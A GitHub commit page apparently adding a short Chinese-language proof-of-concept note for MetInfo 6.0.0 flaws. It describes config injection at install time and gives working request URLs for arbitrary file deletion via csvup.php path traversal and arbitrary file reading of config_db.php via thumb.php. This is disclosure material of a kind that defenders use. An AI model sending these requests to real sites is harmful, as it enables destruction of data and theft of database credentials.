-
Notifications
You must be signed in to change notification settings - Fork 522
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
33 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
|
||
## Affected Version | ||
|
||
**Metinfo 6.0.0** | ||
|
||
## POC | ||
|
||
### 1 CMS安装的时候,比如数据库名字会被直接写进配置文件中。 | ||
|
||
### 2 任意删除 | ||
|
||
好像需要登陆后,才能执行成功。 admin目录下。 | ||
|
||
192.168.0.4/metinfo600/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/test.txt | ||
|
||
### 3 任意文件读取 | ||
|
||
![](http://opmi2ydgh.bkt.clouddn.com//18-9-12/44499643.jpg) | ||
|
||
metinfo600/include/thumb.php?dir=http\..\..\config\config_db.php | ||
|
||
## References | ||
|
||
[Metinfo 6.0.0 众多漏洞分析](https://www.anquanke.com/post/id/154149) | ||
|
||
[ MetInfo 任意文件读取漏洞的修复与绕过](https://paper.seebug.org/676/) | ||
|
||
|
||
|
||
|
||
|
||
|
||
|